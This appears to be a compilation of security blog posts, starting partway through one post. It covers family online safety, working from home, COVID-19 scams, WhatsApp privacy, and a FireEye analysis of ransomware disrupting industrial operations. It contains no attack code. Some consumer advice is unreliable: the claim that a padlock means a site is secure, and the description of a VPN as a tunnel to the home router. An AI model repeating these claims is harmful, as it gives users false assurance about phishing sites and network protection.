Taming all the moving parts of internet safety isn’t easy, and balancing your relationship with your child and parental monitoring can get turbulent at times. While kids can experience more drama and anxiety by going online, social networks remain critical channels for affirmation, self-expression, and connection. In the weeks to come, take time to listen, learn, and get to know your child’s digital passions and patterns. Identify safety gaps and reinforce those areas. Good luck, parents, you’ve got this!

The post Internet Safety for Kids: A Refresher for Homebound Families appeared first on McAfee Blogs.

How to Stay Cyber Safe While Social-Distancing

Do you find yourself working from home these days? Kids off school too? Then your daily life is set to change super-fast. Yes, there is so much to organise to implement this essential ‘social distancing’ strategy. But in the flurry to get everyone set up, it’s essential that we don’t cut corners, make rash decisions so we can ensure both our headspace and online safety aren’t at risk.

The New Era of Social-Distancing

Many workplaces have already instructed their staff to ‘social distance’ and work from home so we can ‘flatten the curve’ while others are probably not far away from making this decision.  Many Australian states have given parents the option to keep their children at home. So, even if you (and the kids) are not yet home, it’s wise to start thinking about how our work (and learn) from home lives might look while we are ‘social-distancing’ and, how can keep our households safe when online. Here’s a few things to consider:

  1. Breath. These are Uncertain Times

It’s completely normal to feel anxious and stressed in this time of great uncertainty. While we are hopeful that ‘social distancing’ measures will help minimise the impact of the virus, the truth is – we just don’t really know what the upcoming months will look like. Acknowledging that you (and all your family members) will be feeling anxious and ‘out of sorts’ at the moment is essential. Cutting family members some slack, particularly if you are all ‘cooped up’ together will definitely make for a smoother self-isolation experience!

  1. Always Think Critically & Don’t Overload on News

When we are feeling panicked and stressed, it’s easy for our rational brains to stop functioning. Social media feeds have been full of ‘miracle cures’ for COVID-19 which have been of great interest to many stressed out peeps. PLEASE avoid clicking links and ‘buying into’ this. Not only could these be links to malicious websites designed to extract your private information, but these themes just feed our anxiety. Instead, seek out advice from reputable medical institutions and authorities. Being a critical thinker online is more important now more than ever.

And if the constant barrage of news about the pandemic is affecting your (and your family’s) mood and outlook then take a break from it. Maybe limit yourself to checking for updates once per day as opposed to having constant updates come through on your phone. It’s super easy to disable news notifications, if you are Apple user, here’s what you need to do and, if you are an Android user, these tips may help.

  1. Ensure You Are Using the Correct Platforms & Software

Before you start downloading programs you think are helpful, check with your workplace or employer about their preferred platforms. It’s highly likely you will have most of the programs they require whether it’s Facetime, Slack, Zoom or Trello. But if you don’t, please ensure you download apps from a reputable source such as the AppStore or Google Play or a site that has been approved by your employer. Third party app sites are to be avoided at all costs because the chances are, you’ll score yourself some malicious software!

  1. Protect Yourself & Your Data

Please check whether you employer has security software and a Virtual Private Network (VPN) installed on your devices. If not, or you are using your ‘home’ devices to undertake company work, then ensuring that both your stored data and the data you share over the internet is protected is essential.

Using a device without security software is a little like leaving your front door open – you are essentially inviting anyone to enter. So, investing in a comprehensive security software solution that protects you from dodgy downloads, visiting fake websites, malicious software and viruses is a no brainer! A VPN will also protect the data that you share from your devices by effectively creating an encrypted tunnel between your device and the router – the ultimate way of keeping the cybercrimals out!

  1. Back-Up Your Data

Check with your employer to ensure that all your data will be backed up, even when working from home. If they can’t guarantee your work will be backed up then you need to find yourself a reliable, safe option. I am a Dropbox fan but Google Drive is also a great tool. But if you need something a little more robust then check out IDrive or IBackUp.

And don’t forget about the kids! If your offspring are remote schooling, ensure all their hard work is backed up too. Google Drive or Dropbox is a great solution for students.

  1. Manage Your Internet Usage at Home

If your household has two adults working from home plus a tribe of kids remote schooling, then chances are your internet may slow. With more than 90% of Aussies now accessing the internet through the NBN, many are worried that the spike in demand may create havoc.  While the folks from NBN keep assuring us that it’s all going to be fine, we may need to find ourselves staggering our internet use. Why not encourage your kids to do offline activities such as reading or craft while you have some designated time for emails or an online meeting? And don’t forget, you can always create a hotspot from your mobile for another internet source.

  1. Invest in Your Back & Neck – Splash Out on Some Gadgets

Setting up a designated workspace at home is critical to providing some structure in this new phase of your work life. Why not use this as an excuse to get properly setup?

I’ve worked from home for many years but could not have done so without my large monitor and my stand-up desk. Like many peeps, I have a dodgy neck so my stand-up desk and large monitor have meant that I can continue to work with no pain! I simply plug my laptop into my monitor and happy days – everything in enlarged and at eye height! On the days that I decide to work from my kitchen benchtop, my neck always starts to throb – you’d think I’d learn!

And don’t think you need to spend a fortune. A large monitor can cost as little as $200 and a stand-up desk not much more. If you are using these items for work, the chances are you’ll be able to claim these purchases as a tax deduction – why not talk to your accountant?

There is no doubt that 2020 will be ‘the year we will remember for the rest of our lives’. And while the bulk of us aren’t in the high-risk category, it is essential that we all do our bit so that we can protect our most vulnerable. So, please take the time to ensure you are cybersafe while setting up your new work (and school) from home life and even more importantly, keep washing your hands!!

Till Next Time

Stay well

Alex xx

The post How to Stay Cyber Safe While Social-Distancing appeared first on McAfee Blogs.

Little Ones Online More? Here Are 10 Basics To Keep Them Safe

protecting kids online

Online safety conversations look dramatically different depending on the age and stage of your child. For very young children, toddlers through elementary school, parents have a golden opportunity to lay the foundations that will shape a child’s digital perspectives and behaviors for a lifetime.

One way to keep younger children safe online is simply to begin. How early, you might ask? From the day they arrive. If you’ve ever seen a four-month-old reach for mommy’s smartphone only to cry when mommy takes it away, it’s clear the baby has observed the culture around him. He knows that the shiny toy that hums is one of mommy’s favorite things. It has the power to capture and hold her attention. It makes her laugh, cry, and influence her routine and emotions.

Protecting kids online

Modeling balanced screen habits is a powerful way to influence behavior as toddlers begin to discover television, apps, interactive toys, and online learning sites. At this stage, intentional steps such as limiting screen time, reviewing content, and talking with your little one in simple concepts about the images and stories encounter will help grow their digital IQs. Note: The American Academy of Pediatrics (AAP) recommends keeping all screens turned off around babies and toddlers younger than 24 months.

Move With The Curve

As kids move into elementary school, technology is often part of the learning experience. Some children (depending on the household) may even own smartphones. Because the integration of technology begins to increase, this stage requires parents to move with the curve of a child’s online safety needs. Priorities: Securing devices kids take to school, setting filters on web browsers, limiting screen and gaming time, encouraging physical activity and hobbies, and having consistent, age-appropriate conversations about the online world is more important than ever.

10 Online Safety Basics for Younger Children

  1. Keep devices in a common area. By locating all computers, TVs, and devices in a common area, parents can easily monitor a child’s online activity. This simple step also helps kids get used to parental monitoring and responsible digital behavior.
  2. Follow family device rules. Establish family ground rules for technology use and repeat them to your younger children. Every child’s maturity and self-control level is different. If you think your child’s connection with his or her technology begins to tip toward the unhealthy, make adjustments as you go. If you set a 20-minute game time limit, be ready to enforce it consistently. In our experience, inconsistency in enforcing technology rules when kids are young is one of the biggest regrets among parents of teens.
  3. Introduce password security. As we accumulate IoT devices, it’s common for younger children to interact with home assistants, SmartTVs, digital toys, and online games. When password prompts come up on a login screen, explain to your child what you are doing (use your password) and why passwords are necessary. Get into the habit of using 2-factor authentication for passwords and locking your device home screens with a pin code.
  4. Filter content. Younger kids accept content at face value and don’t have the critical thinking skills process information or to be alone online. If you allow younger kids online, consider sitting with them, and explaining the content in front of them. To avoid the chance of your child encountering inappropriate content by mistake, consider adding parental control software to family devices.protecting kids online
  5. Start the privacy conversation. Kids of all ages understand the word “mine.” As your kids interact with the online in the early years, explain why it’s essential to keep their name, picture, family member names, school name, and address private.
  6. Introduce VPN use early. Browsing on a secure network (VPN, Virtual Private Network) from an early age reinforces the concept of privacy online. Explain to your child how the private encryption “tunnel” your content (searches, activity, messages) passes through and how that keeps other people from grabbing your private information. Even a text conversation with Grandma could accidentally give away information.
  7. Explain the concept of scams. When age-appropriate, explain how (and why) some people online try to trick you into clicking a box or a link to learn more about you. Discuss why you shouldn’t click on pop-up ads, hyperlinks, and messages that could contain malware or phishing links. To guard family devices against malicious links, consider free tools like Web Advisor.
  8. Discuss digital stranger danger. When you open a web browser, you open your home to content and people you don’t know. Children of any age can inadvertently run into digital danger zones. Teach young children not to talk to a stranger online or send (or share) photos with others. It’s also a good idea to cover the camera lens on your laptop or tablet, advise children to never stay on a website you would not approve of, and to never download or click a link without asking your permission.
  9. Introduce safe social networking. Online communities are here to stay, so consider starting social network safety talks early. Several kid-friendly browsers, apps, and social networks exist online for younger kids and are perfect for teaching them about privacy settings, how to collaborate and interact with others online.
  10. Start talking. Keep talking. Of all the principles we’ve featured, we’ve saved the best for last. Creating an open, trusting dialogue with your child is your #1 security tool in keeping your child safe online today and into the future.

While schools introduce kids to internet safety basics to protect kids online and do well to refresh concepts along the way, it’s the consistent, intentional work of parents that shape the values and skills a child needs to navigate the online world. By putting some of these foundational principles in place early and committing to consistent follow-through, it’s possible to maintain critical influence as your children move into different phases of their digital lives.

The post Little Ones Online More? Here Are 10 Basics To Keep Them Safe appeared first on McAfee Blogs.

Coronavirus Cybersecurity: Scams To Watch Out For

The Coronavirus pandemic has shocked the world in recent months, with many countries being forced to go into lockdown or encourage its nationals to self-isolate as much as possible. Many are trying to work out how to juggle working from home, caring for their children, managing their finances and looking after their health! But sadly, there’s one more thing you need to add to that list - staying safe online and watching out for scammers. 

That’s because cybercriminals have decided to take advantage of the global fear, confusion and uncertainty around the world. Plus, vast numbers of people are now working from home and this usually means they are doing so with less cybersecurity measures in place than they would have in their office. 

Malicious messages examples seen
  • email and social media messages impersonating medical expert bodies including the NHS, World Health Organization (WHO), and Centre for Disease and Control (CDC), requesting a donation to research a vaccine.
  • GOV.UK themed text messages titled 'You are eligible to get a tax refund (rebate) of 128.34 GBP
  • messages advertising protective masks and hand sanitisers from bogus websites
So, despite this being a time when we all need to pull together and help one another out, there are still scammers out there looking to cause trouble. To help keep you safe online, Evalian has compiled a list of four of the most common Coronavirus scams happening right now, so you know what to look out for. 

1. Phishing Scams 
This is perhaps the biggest scam out there right now because phishing emails can come in many different forms. Most commonly, hackers are pretending to be health officials or national authorities offering advice about staying safe during the Corona outbreak. The reality is that they are trying to trick unsuspecting individuals into downloading harmful malware or providing sensitive, personal information. 

Some of these phishing emails look really sophisticated, with one in particular being a fake email sent from the World Health Organisation (WHO), offering tips on how to avoid falling ill with the virus. Once the email user clicks on the link provided, they are redirected to a site that steals their personal information. The problem is, with so many people being genuinely worried about their health and hoping to stop the spread, many don’t suspect that these types of emails could be a scam. 

The best way to avoid falling victim to these types of phishing emails is to look for suspicious email addresses or lots of spelling mistakes. And even if the email looks pretty legitimate, it might still be worth going direct to the sender’s website instead. For example, going direct to the World Health Organisation website for advice means you can avoid clicking any links from the email. That way you can find the information you need and reduce the risk of falling victim to a cybercrime. 

Secondly, if an email asks for money or bitcoin donations to help tackle Coronavirus, don’t make any transfers. Again, if you wish to help by donating money or services, go directly to the websites of charities or health organisations to see how you can help.

It’s also worth noting, that these phishing scams can also be received as a text message or phone call. If you receive strange texts or voicemails asking for donations, giving offers on vaccines or warning you about cases in your local area, approach with caution and certainly don’t give away any of your personal details. 

2. Fake Websites
Another common scam designed to play on fear and uncertainty is the setting up of fake websites. Cybercriminals are creating Coronavirus-related websites which claim to offer pharmaceuticals or remedies for the virus such as testing kits, vaccines, and other fake health solutions. The idea is to get anxious victims to part with their bank details or to hack their computer and install malware on their systems. 

In these situations, there are some things you can do. Firstly, check if the website has a secure connection. You’ll know whether it does or doesn't by the padlock in the search bar. If there is a padlock in the search bar this means the site is secure, if there isn't, then it’s a good idea to avoid this site. Not only this but if the website is poorly designed and the text has a lot of spelling and grammatical errors, this could also be a big red flag. 

Finally, it’s also important to be aware that not many sites are genuinely going to be offering these health solutions and if they appear to be selling in-demand products at an extremely low price, then it’s most likely a scam. Remember, if it seems to good to be true then it probably is. 

3. App Scams 
Cybercriminals are also targeting smartphones and mobile devices with dedicated Coronavirus apps. These apps claim to track the spread of the virus in your local area and with many people concerned about the proximity of the virus to their home, it’s not surprising that people are willing to download such an app. 

The reality, however, is that the app then installs malware into your device and not only comprises your tech, but also all the personal information stored within it. In some cases, the app can lock victims out of their phone or tablet demanding a ransom to get back in, threatening to delete all the information, contact details and photos stored inside.

4. Fake Coronavirus Maps
Last but not least, the fake Coronavirus map scam. Similar to that of the tracking app, cybercriminals have begun circulating graphics of fake maps on which they claim to highlight where all the Coronavirus cases are in your country. These are usually sent round on social media and through email. 

Of course, these images are not meant to educate or help you in any way. In fact, the scammers include malware in the links so that once you’ve clicked to open the image this immediately infects your device. In most cases, this has been reported to be the kind of bug that can steal data such as bank details, passwords, login information and other sensitive data stored on your device. 

Look for the Red Flags 
  • Never open attachments or click on links within suspicious or unexpected emails, text and social media messages
  • Look for the suspicious signs; does the message convey a sense of urgency to perform an action?
  • Always remember legitimate organisations never ask for passwords, payment card details and sensitive data to be sent by email
In these troubling and uncertain times, you’d be forgiven for falling for a scam if you thought for one second it could help to keep you and your family safe from this virus. But sadly, there are criminals out there taking advantage of people’s anxiety. So just be aware that these scams are happening and look out for the red flags we’ve mentioned above to help you stay safe online. 

Honey, We’re Home! Securing Your Devices and Your Family Bond  

family device security

More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

Securing family technology

Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Too, with a new work-at-home lifestyle, the software (with time limits) can also make scheduling family breaks together much more manageable.

Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think its a hassle, consider the simplicity of a password manager. Using a password manager will make changing passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

Securing your family bond

Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life balance or school-life (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids is teaching them with the same value.

It’s a new frontier parent, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

The post Honey, We’re Home! Securing Your Devices and Your Family Bond   appeared first on McAfee Blogs.

WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private?

WhatsApp hacks

WhatsApp one of the largest instant messengers and considered by many a social network of its own. So, in continuing our app safety discussion, we’re diving into some of the top security hacks and questions many WhatsApp app users and parents may have.

But first, what’s a security hack? In short, it’s an attempt to exploit the weaknesses in an app, network, or digital service to gain unauthorized access, usually for some illicit purpose. Here are just some of the concerns WhatsApp users may have and some suggestions on boosting security.

WhatsApp Hack FAQ

Are WhatsApp conversations private?

Yes — but there are exceptions. More than any other app, WhatsApp offers greater privacy thanks to end-to-end encryption that scrambles messages to ensure only you and the person you’re communicating with can read your messages or listen to your calls. Here’s the catch: WhatsApp messages (which include videos and photos) are vulnerable before they are encrypted and after they are decrypted if a hacker has managed to drop spyware on the phone. Spyware attacks on WhatsApp have already occurred. Safe Family Tip: No conversation shared between devices is ever 100% private. To increase your WhatsApp security, keep sensitive conversations and content offline, and keep your app updated. 

Can anyone read my deleted WhatsApp messages?

A WhatsApp user can access his or her own deleted messages via the chat backup function that automatically backs up all of your messages at 2 a.m. every day. WhatsApp users can delete a message by using the Delete for Everyone button within an hour after sending though it’s not foolproof. Here’s the catch: Anyone who receives the message before it’s deleted can take a screenshot of it. So, there’s no way to ensure regrettable content isn’t captured, archived, or shared. There are also third-party apps that will recall deleted messages shared by others. Another possibility is that a hacker can access old chats stored in an app user’s cloud. Safe Family Tip: Think carefully about sharing messages or content you may regret later.

Can WhatsApp messages be deleted permanently?

Even if a WhatsApp user decides to delete a message, it’s no guarantee of privacy since conversations are two-way, and the person on the receiving end may screenshot or save a copy of a chat, video, or photo. On the security side, you may delete a message and see it disappear, but WhatsApp still retains a “forensic trace of the chat” that can be used by hackers for mining data, according to reports. Safe Family Tip: For extra security, turn off backups in WhatsApp’s Settings.

WhatsApp hacksHow can I secure my WhatsApp?

It’s crucial when using WhatsApp (or any other app) to be aware of common scams, including malware, catfishing, job and money scams, spyware, and file jacking. To amplify security, turn on Security Notifications in Settings, which will send an alert if, for some reason, your security code changes. Other ways to boost security: Use two-step verification, never share your 6-digit SMS verification code, disable cloud back up, and set your profile to private. Safe Family Tip: Install comprehensive family security software and secure physical access to your phone or laptop with a facial, fingerprint, or a passcode ID. Don’t open (block, report) messages from strangers or spammers. Never share personal information with people you don’t know. 

How do I delete my WhatsApp account from another phone?

To delete a WhatsApp account go to > Settings > Account > Delete My Account. Deleting your account erases message history, removes you from groups, and deletes your backup data. According to WhatsApp, for users moving from one type of phone to another, such as from an iPhone to an Android, and keeping the same phone number, your account information stays intact, but you won’t be able to migrate messages across platforms. If you’re not keeping your number, you should delete WhatsApp from your old phone, download WhatsApp to your new phone, and verify your new phone number. Upgrading the same phone type will likely include options to migrate messages. Safe Family Tip: Before you give away or exchange an old phone, wipe it clean of all your data.

How do you know your WhatsApp is scanned?

WhatsApp users can easily sync devices by downloading the WhatsApp web app and activating it (Settings > WhatsApp Web/Desktop). Devices sync by scanning a QR code that appears on your laptop screen. You know your device is scanned when you see the green chat screen appear on your desktop. Safe Family Tip: It’s possible for a person with physical access to your desktop to scan your QR code and to gain account access. If you think someone has access to your account log out of all your active web sessions in WhatsApp on your mobile phone.

How long are WhatsApp messages stored?

According to WhatsApp, once a user’s messages are delivered, they are deleted from WhatsApp servers. This includes chats, photos, videos, voice messages, and files. Messages can still be stored on each individual’s device. Safe Family Tip: The moment you send any content online, it’s out of your control. The person or group on the receiving end can still store it on their device or to their cloud service. Never send risky content. 

How secure is WhatsApp?

There’s no doubt, end-to-end encryption makes it much more difficult for hackers to read WhatsApp messages. While WhatsApp is more secure than other messaging apps — but not 100% secure.

Is it true that WhatsApp has been hacked?

Yes. Several times and in various ways. No app, service, or network has proven to be unhackable. Safe Family Tip: Assume that any digital platform is vulnerable. Maximize privacy settings, never share risky content, financial information, or personal data.

Is WhatsApp safe to send pictures?

Encryption ensures that a transmission is secure, but that doesn’t mean WhatsApp content is safe or that human behavior is predictable. People (even trusted friends) can share private content. People can also illegally attempt to gain access to any content you’ve shared. This makes WhatsApp (along with other digital sharing channels) unsafe for exchanging sensitive information or photos. Safe Family Tip: Nothing on the internet is private. Never send or receive pictures that may jeopardize your privacy, reputation, or digital footprint.

WhatsApp isn’t the only popular app with security loopholes hackers exploit. Every app or network connected to the internet is at risk for some type of cyberattack. We hope this post sparks family discussions that help your kids use this and other apps wisely and helps keep your family’s privacy and safety online top of mind.

The post WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private? appeared first on McAfee Blogs.

Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which  expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

  • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
  • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
  • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.

Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

As recently as February 2020, the Cybersecurity Infrastructure and Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shut down of operations that lasted two days.

Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

  • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
  • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
  • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
  • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
  • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
  • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
  • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
  • Note, that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

Uncovering New Magecart Implant Attacking eCommerce

